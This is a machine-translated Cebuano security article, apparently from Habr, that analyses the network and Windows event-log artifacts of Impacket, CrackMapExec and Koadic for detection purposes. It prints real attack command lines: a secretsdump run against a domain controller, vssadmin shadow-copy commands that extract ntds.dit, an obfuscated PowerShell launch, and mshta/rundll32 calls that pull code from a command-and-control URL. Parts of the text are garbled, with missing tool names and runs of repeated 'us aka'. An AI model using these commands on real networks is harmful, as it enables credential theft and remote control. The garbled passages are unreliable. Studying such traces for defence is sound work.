Ang gidaghanon sa mga pag-atake sa sektor sa korporasyon nagkadako matag tuig: pananglitan kay sa 2016, ug sa katapusan sa 2018 - kaysa sa miaging panahon. Lakip sa mga diin ang nag-unang himan sa pagtrabaho mao ang Windows operating system. Sa 2017-2018, ang APT Dragonfly, APT28, Naghimo og mga pag-atake sa mga organisasyon sa gobyerno ug militar sa Europe, North America ug Saudi Arabia. Ug gigamit namo ang tulo ka mga himan alang niini - , ΠΈ . Ang ilang source code bukas ug anaa sa GitHub.
Angay nga matikdan nga kini nga mga himan wala gigamit alang sa inisyal nga pagsulod, apan aron mapalambo ang usa ka pag-atake sa sulod sa imprastraktura. Gigamit kini sa mga tig-atake sa lainlaing yugto sa pag-atake pagkahuman sa pagsulod sa perimeter. Kini, sa laing bahin, lisud nga makit-an ug kasagaran lamang sa tabang sa teknolohiya o mga himan nga nagtugot . Ang mga himan naghatag og lain-laing mga gimbuhaton, gikan sa pagbalhin sa mga file ngadto sa pagpakig-uban sa registry ug pagpatuman sa mga sugo sa usa ka hilit nga makina. Naghimo kami usa ka pagtuon sa kini nga mga himan aron mahibal-an ang ilang kalihokan sa network.
Unsa ang kinahanglan namon buhaton:
- Sabta kung giunsa ang mga himan sa pag-hack. Hibal-i kung unsa ang kinahanglan nga pahimuslan sa mga tig-atake ug unsa nga mga teknolohiya ang ilang magamit.
- Pangitaa kung unsa ang wala mahibal-an sa mga himan sa seguridad sa impormasyon sa unang mga hugna sa usa ka pag-atake. Ang yugto sa reconnaissance mahimong laktawan, tungod kay ang tig-atake usa ka internal nga tig-atake, o tungod kay ang tig-atake nagpahimulos sa usa ka lungag sa imprastraktura nga wala pa nahibal-an kaniadto. Mahimong posible nga ibalik ang tibuuk nga kadena sa iyang mga aksyon, busa ang tinguha nga makit-an ang dugang nga paglihok.
- Kuhaa ang mga sayup nga positibo gikan sa mga himan sa pag-detect sa intrusion. Dili nato kalimtan nga kung ang pipila nga mga aksyon nakit-an base sa pag-reconnaissance nga nag-inusara, posible ang kanunay nga mga sayup. Kasagaran sa imprastraktura adunay igo nga gidaghanon sa mga paagi, dili mailhan gikan sa mga lehitimo sa una nga pagtan-aw, aron makakuha bisan unsang kasayuran.
Unsa ang gihatag niini nga mga himan sa mga tig-atake? Kung kini ang Impacket, nan ang mga tig-atake makadawat usa ka dako nga librarya sa mga module nga magamit sa lainlaing mga yugto sa pag-atake nga nagsunod pagkahuman gibuak ang perimeter. Daghang mga himan ang naggamit sa mga module sa Impacket sa sulod - pananglitan, Metasploit. Kini adunay dcomexec ug wmiexec alang sa remote command execution, secretsdump alang sa pagkuha sa mga account gikan sa memorya nga gidugang gikan sa Impacket. Ingon usa ka sangputanan, ang husto nga pag-ila sa kalihokan sa ingon nga librarya magsiguro nga makit-an ang mga gigikanan.
Dili sulagma nga ang mga tiglalang misulat sa "Powered by Impacket" mahitungod sa CrackMapExec (o yanong CME). Dugang pa, ang CME adunay andam nga pag-andar alang sa mga sikat nga senaryo: Mimikatz para sa pagkuha sa mga password o sa ilang mga hash, pagpatuman sa Meterpreter o ahente sa Imperyo alang sa hilit nga pagpatay, ug Bloodhound sakay.
Ang ikatulo nga himan nga among gipili mao ang Koadic. Bag-o lang kini, gipresentar kini sa internasyonal nga komperensya sa hacker DEFCON 25 sa 2017 ug gipalahi sa usa ka dili standard nga pamaagi: kini nagtrabaho pinaagi sa HTTP, Java Script ug Microsoft Visual Basic Script (VBS). Kini nga pamaagi gitawag nga pagpuyo gikan sa yuta: ang himan naggamit sa usa ka hugpong sa mga dependency ug mga librarya nga gitukod sa Windows. Gitawag kini sa mga magbubuhat nga COM Command & Control, o C3.
IMPACKET
Lapad kaayo ang pagpaandar ni Impacket, gikan sa reconnaissance sulod sa AD ug pagkolekta sa datos gikan sa internal nga MS SQL server, ngadto sa mga teknik sa pagkuha og mga kredensyal: kini usa ka SMB relay attack, ug pagkuha sa ntds.dit file nga adunay mga hash sa user password gikan sa domain controller. Ang Impacket nagpatuman usab sa mga sugo sa layo gamit ang upat ka lain-laing mga pamaagi: WMI, Windows Scheduler Management Service, DCOM, ug SMB, ug nagkinahanglan og mga kredensyal sa pagbuhat niini.
Secretsdump
Atong tan-awon ang secretsdump. Kini usa ka module nga mahimong target sa mga makina sa gumagamit ug mga tigkontrol sa domain. Mahimo kini gamiton aron makakuha og mga kopya sa mga lugar sa memorya nga LSA, SAM, SECURITY, NTDS.dit, aron kini makita sa lain-laing mga yugto sa pag-atake. Ang unang lakang sa operasyon sa module mao ang pag-authenticate pinaagi sa SMB, nga nagkinahanglan sa password sa user o sa hash niini aron awtomatikong ipatuman ang Pass the Hash attack. Sunod moabut ang usa ka hangyo sa pag-abli sa pag-access sa Service Control Manager (SCM) ug pag-access sa registry pinaagi sa winreg protocol, gamit ang usa ka tig-atake nga mahibal-an ang datos sa mga sanga sa interes ug makakuha og mga resulta pinaagi sa SMB.
Sa Fig. 1 atong makita kung unsa ka eksakto kung gigamit ang winreg protocol, nakuha ang pag-access gamit ang registry key nga adunay LSA. Aron mahimo kini, gamita ang sugo sa DCERPC nga adunay opcode 15 - OpenKey.
bugas. 1. Pag-abli sa usa ka registry key gamit ang winreg protocol
Sunod, kung makuha ang pag-access sa yawe, ang mga kantidad gitipigan gamit ang SaveKey nga mando nga adunay opcode 20. Gihimo kini sa Impacket sa usa ka piho nga paagi. Gitipigan niini ang mga kantidad sa usa ka file kansang ngalan usa ka hugpong sa 8 ka random nga mga karakter nga gidugtong sa .tmp. Dugang pa, ang dugang nga pag-upload niini nga file mahitabo pinaagi sa SMB gikan sa System32 directory (Fig. 2).
bugas. 2. Scheme para sa pagkuha og registry key gikan sa remote machine
Kini nahimo nga ang ingon nga kalihokan sa network mahimong mahibal-an pinaagi sa mga pangutana sa pipila nga mga sanga sa rehistro gamit ang winreg protocol, piho nga mga ngalan, mga mando ug ang ilang order.
Kini nga module nagbilin usab og mga bakas sa log sa panghitabo sa Windows, nga dali nga makit-an. Pananglitan, isip resulta sa pagpatuman sa sugo
secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DCSa Windows Server 2016 log atong makita ang mosunod nga yawe nga han-ay sa mga panghitabo:
1. 4624 - hilit nga Logon.
2. 5145 - pagsusi sa mga katungod sa pag-access sa winreg remote nga serbisyo.
3. 5145 - pagsusi sa mga katungod sa pag-access sa file sa System32 directory. Ang file adunay random nga ngalan nga gihisgutan sa ibabaw.
4. 4688 - paghimo og proseso sa cmd.exe nga naglansad sa vssadmin:
βC:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat5. 4688 - paghimo og proseso nga adunay sugo:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat6. 4688 - paghimo og proseso nga adunay sugo:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat7. 4688 - paghimo og proseso nga adunay sugo:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.batSmbexec
Sama sa daghang mga gamit sa post-exploitation, ang Impacket adunay mga module alang sa layo nga pagpatuman sa mga mando. Magpokus kami sa smbexec, nga naghatag usa ka interactive nga command shell sa usa ka hilit nga makina. Kini nga module nagkinahanglan usab og authentication pinaagi sa SMB, bisan sa password o hash sa password. Sa Fig. Sa Figure 3 atong makita ang usa ka panig-ingnan kon sa unsang paagi ang usa ka himan sa pagtrabaho, sa niini nga kaso kini mao ang lokal nga administrator console.
bugas. 3. Interactive smbexec console
Ang unang lakang sa smbexec human sa authentication mao ang pag-abli sa SCM gamit ang OpenSCManagerW command (15). Ang pangutana talagsaon: ang MachineName field kay DUMMY.
bugas. 4. Paghangyo nga ablihan ang Service Control Manager
Sunod, ang serbisyo gihimo gamit ang CreateServiceW command (12). Sa kaso sa smbexec, makita namon ang parehas nga lohika sa pagtukod sa mando matag higayon. Sa Fig. Ang 5 nga berde nagpakita sa dili mausab nga mga parameter sa command, ang yellow nagpakita kung unsa ang mahimo sa usa ka tig-atake. Sayon nga makita nga ang ngalan sa executable file, ang direktoryo niini ug ang output file mahimong mabag-o, apan ang nahabilin labi ka lisud nga usbon nga dili makabalda sa lohika sa Impacket module.
bugas. 5. Paghangyo sa paghimo og serbisyo gamit ang Service Control Manager
Nagbilin usab ang Smbexec og klaro nga mga pagsubay sa log sa panghitabo sa Windows. Sa Windows Server 2016 log alang sa interactive command shell nga adunay ipconfig command, atong makita ang mosunod nga yawe nga han-ay sa mga panghitabo:
1. 4697 β pag-instalar sa serbisyo sa makina sa biktima:
%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
2. 4688 - paghimo sa proseso sa cmd.exe nga adunay mga argumento gikan sa punto 1.
3. 5145 - pagsusi sa mga katungod sa pag-access sa __output file sa C$ nga direktoryo.
4. 4697 β pag-instalar sa serbisyo sa makina sa biktima.
%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
5. 4688 - paghimo sa proseso sa cmd.exe nga adunay mga argumento gikan sa punto 4.
6. 5145 - pagsusi sa mga katungod sa pag-access sa __output file sa C$ nga direktoryo.
Ang Impacket mao ang sukaranan alang sa pag-uswag sa mga himan sa pag-atake. Gisuportahan niini ang hapit tanan nga mga protocol sa imprastraktura sa Windows ug sa parehas nga oras adunay kaugalingon nga mga kinaiya nga bahin. Ania ang piho nga mga hangyo sa winreg, ug ang paggamit sa SCM API nga adunay kinaiya nga command formation, ug ang file name format, ug ang SMB share SYSTEM32.
CRACKMAPEXEC
Ang himan sa CME gidisenyo sa panguna aron ma-automate ang naandan nga mga aksyon nga kinahanglan buhaton sa usa ka tig-atake aron mag-uswag sa sulod sa network. Gitugotan ka niini nga magtrabaho kauban ang bantog nga ahente sa Imperyo ug Meterpreter. Aron ipatuman ang mga sugo sa tago, ang CME makahimo sa pag-obfuscate kanila. Gamit ang Bloodhound (usa ka bulag nga himan sa pag-reconnaissance), ang usa ka tig-atake mahimo nga awtomatiko ang pagpangita alang sa usa ka aktibo nga sesyon sa tagdumala sa domain.
Bloodhound
Ang Bloodhound, isip usa ka standalone nga himan, nagtugot alang sa advanced reconnaissance sulod sa network. Gikolekta niini ang datos bahin sa mga tiggamit, makina, grupo, sesyon ug gihatag ingon usa ka script sa PowerShell o binary file. Ang LDAP o SMB-based nga mga protocol gigamit sa pagkolekta og impormasyon. Ang CME integration module nagtugot sa Bloodhound nga ma-download sa makina sa biktima, modagan ug makadawat sa nakolekta nga datos human sa pagpatay, sa ingon ma-automate ang mga aksyon sa sistema ug himoon kini nga dili kaayo mamatikdan. Ang Bloodhound graphical shell nagpakita sa nakolekta nga datos sa porma sa mga graph, nga nagtugot kanimo sa pagpangita sa pinakamubo nga agianan gikan sa makina sa tig-atake ngadto sa domain administrator.
bugas. 6. Interface sa Bloodhound
Aron makadagan sa makina sa biktima, ang module nagmugna og buluhaton gamit ang ATSVC ug SMB. Ang ATSVC usa ka interface alang sa pagtrabaho kauban ang Windows Task Scheduler. Gigamit sa CME ang iyang function nga NetrJobAdd(1) aron maghimo mga buluhaton sa network. Usa ka pananglitan kung unsa ang gipadala sa CME module gipakita sa Fig. 7: Kini usa ka cmd.exe command call ug obfuscated code sa porma sa mga argumento sa XML format.
Fig.7. Paghimo og buluhaton pinaagi sa CME
Pagkahuman sa buluhaton nga gisumite para sa pagpatay, ang makina sa biktima nagsugod mismo sa Bloodhound, ug kini makita sa trapiko. Ang module gihulagway sa mga pangutana sa LDAP aron makakuha og mga standard nga grupo, usa ka lista sa tanan nga mga makina ug tiggamit sa domain, ug makakuha og kasayuran bahin sa mga aktibo nga sesyon sa tiggamit pinaagi sa hangyo sa SRVSVC NetSessEnum.
bugas. 8. Pagbaton ug listahan sa mga aktibong sesyon pinaagi sa SMB
Dugang pa, ang paglansad sa Bloodhound sa makina sa biktima nga adunay pagpaandar sa pag-audit giubanan sa usa ka panghitabo nga adunay ID 4688 (pagmugna sa proseso) ug ang ngalan sa proseso. Β«C:WindowsSystem32cmd.exeΒ». Unsa ang talagsaon bahin niini mao ang mga argumento sa command line:
cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , β¦ , 40,41 )-jOIN'' ) "Enum_avproducts
Ang enum_avproducts module makaiikag kaayo gikan sa punto sa panglantaw sa pagpaandar ug pagpatuman. Gitugotan ka sa WMI nga gamiton ang WQL nga pangutana nga lengguwahe aron makuha ang datos gikan sa lainlaing mga butang sa Windows, nga mao gyud ang gigamit sa kini nga CME module. Naghimo kini og mga pangutana sa AntiSpywareProduct ug AntiΠirusProduct nga mga klase mahitungod sa mga himan sa pagpanalipod nga gibutang sa makina sa biktima. Aron makuha ang gikinahanglan nga datos, ang module nagkonektar sa rootSecurityCenter2 namespace, dayon nagmugna og WQL nga pangutana ug nakadawat og tubag. Sa Fig. Ang Figure 9 nagpakita sa sulod sa maong mga hangyo ug tubag. Sa among pananglitan, nakit-an ang Windows Defender.
bugas. 9. Kalihokan sa network sa enum_avproducts module
Kasagaran, ang WMI auditing (Trace WMI-Activity), diin ang mga panghitabo makit-an nimo ang mapuslanon nga kasayuran bahin sa mga pangutana sa WQL, mahimong ma-disable. Apan kung kini mahimo, unya kung ang enum_avproducts script gipadagan, usa ka panghitabo nga adunay ID 11. Kini adunay sulud nga ngalan sa tiggamit nga nagpadala sa hangyo ug ang ngalan sa rootSecurityCenter2 namespace.
Ang matag usa sa CME modules adunay kaugalingon nga mga artifact, bisan kini nga piho nga WQL nga mga pangutana o paghimo sa usa ka piho nga klase sa buluhaton sa usa ka task scheduler nga adunay obfuscation ug Bloodhound-specific nga kalihokan sa LDAP ug SMB.
KOADIC
Usa ka talagsaon nga bahin sa Koadic mao ang paggamit sa JavaScript ug VBScript nga mga tighubad nga gitukod sa Windows. Niini nga pagsabut, kini nagsunod sa pagkinabuhi sa us aka us aka us aka us aka us aka us aka us aka us aka us aka us aka mga dependency sa gawas ug gigamit ang standard nga mga himan sa Windows. Kini usa ka himan alang sa hingpit nga Command & Control (CnC), tungod kay pagkahuman sa impeksyon usa ka "implant" ang gibutang sa makina, nga gitugotan kini nga makontrol. Ang ingon nga makina, sa terminolohiya sa Koadic, gitawag nga "zombie." Kung adunay dili igo nga mga pribilehiyo alang sa hingpit nga operasyon sa kilid sa biktima, ang Koadic adunay katakus sa pagpataas kanila gamit ang mga pamaagi sa User Account Control bypass (UAC bypass).
bugas. 10. Koadic Shell
Ang biktima kinahanglan nga magsugod sa komunikasyon sa Command & Control server. Aron mahimo kini, kinahanglan niya nga makontak ang usa ka naandam na nga URI ug makadawat sa nag-unang Koadic nga lawas gamit ang usa sa mga stagers. Sa Fig. Ang Figure 11 nagpakita sa usa ka pananglitan alang sa mshta stager.
bugas. 11. Pagsugod ug sesyon sa CnC server
Base sa tubag nga variable nga WS, kini nahimong tin-aw nga ang pagpatuman mahitabo pinaagi sa WScript.Shell, ug ang mga variable STGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE naglangkob sa mahinungdanong impormasyon mahitungod sa mga parameter sa kasamtangan nga sesyon. Kini ang una nga pares nga hangyo-tubag sa usa ka koneksyon sa HTTP sa usa ka server sa CnC. Ang sunod-sunod nga mga hangyo direkta nga may kalabutan sa pagpaandar sa gitawag nga mga module (implants). Ang tanan nga mga module sa Koadic nagtrabaho lamang sa usa ka aktibo nga sesyon sa CnC.
Mimikatz
Sama sa CME nga nagtrabaho kauban ang Bloodhound, ang Koadic nagtrabaho kauban ang Mimikatz ingon usa ka lahi nga programa ug adunay daghang mga paagi sa paglansad niini. Sa ubos usa ka pares nga tubag sa hangyo alang sa pag-download sa Mimikatz implant.
bugas. 12. Ibalhin si Mimikatz sa Koadic
Makita nimo kung giunsa pagbag-o ang format sa URI sa hangyo. Kini karon adunay usa ka bili alang sa csrf variable, nga maoy responsable sa pinili nga module. Ayaw tagda ang iyang ngalan; Kitang tanan nahibal-an nga ang CSRF kasagarang masabtan nga lahi. Ang tubag mao ang parehas nga punoan nga lawas sa Koadic, diin gidugang ang code nga may kalabotan sa Mimikatz. Kini dako kaayo, busa atong tan-awon ang mahinungdanong mga punto. Dinhi naa ang librarya sa Mimikatz nga gi-encode sa base64, usa ka serialized .NET nga klase nga mag-inject niini, ug mga argumento aron ilunsad ang Mimikatz. Ang resulta sa pagpatuman gipasa sa network sa tin-aw nga teksto.
bugas. 13. Resulta sa pagpadagan sa Mimikatz sa layo nga makina
Exec_cmd
Ang Koadic usab adunay mga module nga makapatuman sa mga mando sa layo. Dinhi atong makita ang parehas nga pamaagi sa henerasyon sa URI ug ang pamilyar nga mga variable sa sid ug csrf. Sa kaso sa exec_cmd module, ang code idugang sa lawas nga makahimo sa pagpatuman sa mga sugo sa shell. Sa ubos gipakita ang maong code nga anaa sa HTTP nga tubag sa CnC server.
bugas. 14. Implant code exec_cmd
Ang GAWTUUGCFI variable nga adunay pamilyar nga WS attribute gikinahanglan para sa code execution. Uban sa tabang niini, ang implant nagtawag sa kabhang, pagproseso sa duha ka mga sanga sa code - shell.exec uban sa pagbalik sa output data stream ug shell.run nga walay pagbalik.
Ang Koadic dili usa ka tipikal nga himan, apan kini adunay kaugalingon nga mga artifact diin kini makit-an sa lehitimong trapiko:
- espesyal nga pagporma sa mga hangyo sa HTTP,
- gamit ang winHttpRequests API,
- paghimo og WScript.Shell nga butang pinaagi sa ActiveXObject,
- dako nga executable nga lawas.
Ang inisyal nga koneksyon gisugdan sa stager, mao nga posible nga makit-an ang kalihokan niini pinaagi sa mga panghitabo sa Windows. Alang sa mshta, kini ang panghitabo 4688, nga nagpaila sa paghimo sa usa ka proseso nga adunay pagsugod nga hiyas:
C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6Samtang nagdagan ang Koadic, makita nimo ang ubang 4688 nga mga panghitabo nga adunay mga kinaiya nga hingpit nga nagpaila niini:
rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1kaplag
Ang us aka us aka us aka us aka us aka us aka us aka us aka us aka us aka tanyag sa mga kriminal. Gigamit nila ang mga himan ug mekanismo nga gitukod sa Windows alang sa ilang mga panginahanglan. Nakita namon ang mga sikat nga himan nga Koadic, CrackMapExec ug Impacket nga nagsunod niini nga prinsipyo nga labi nga makita sa mga taho sa APT. Ang gidaghanon sa mga tinidor sa GitHub alang niini nga mga himan nagkadako usab, ug ang mga bag-o nagpakita (adunay mga usa ka libo niini karon). Ang uso nagkapopular tungod sa kayano niini: ang mga tig-atake wala magkinahanglan sa mga himan sa ikatulo nga partido; naa na sila sa mga makina sa mga biktima ug gitabangan sila nga makalikay sa mga lakang sa seguridad. Nagtutok kami sa pagtuon sa komunikasyon sa network: ang matag himan nga gihulagway sa ibabaw nagbilin sa kaugalingon nga mga timailhan sa trapiko sa network; ang detalyado nga pagtuon niini nagtugot kanamo sa pagtudlo sa among produkto makit-an sila, nga sa katapusan makatabang sa pag-imbestiga sa tibuuk nga kadena sa mga insidente sa cyber nga naglambigit kanila.
tigsulat:
- Anton Tyurin, Ulo sa Departamento sa Mga Serbisyo sa Eksperto, PT Expert Security Center, Positive Technologies
- Egor Podmokov, eksperto, PT Expert Security Center, Positive Technologies
Source: www.habr.com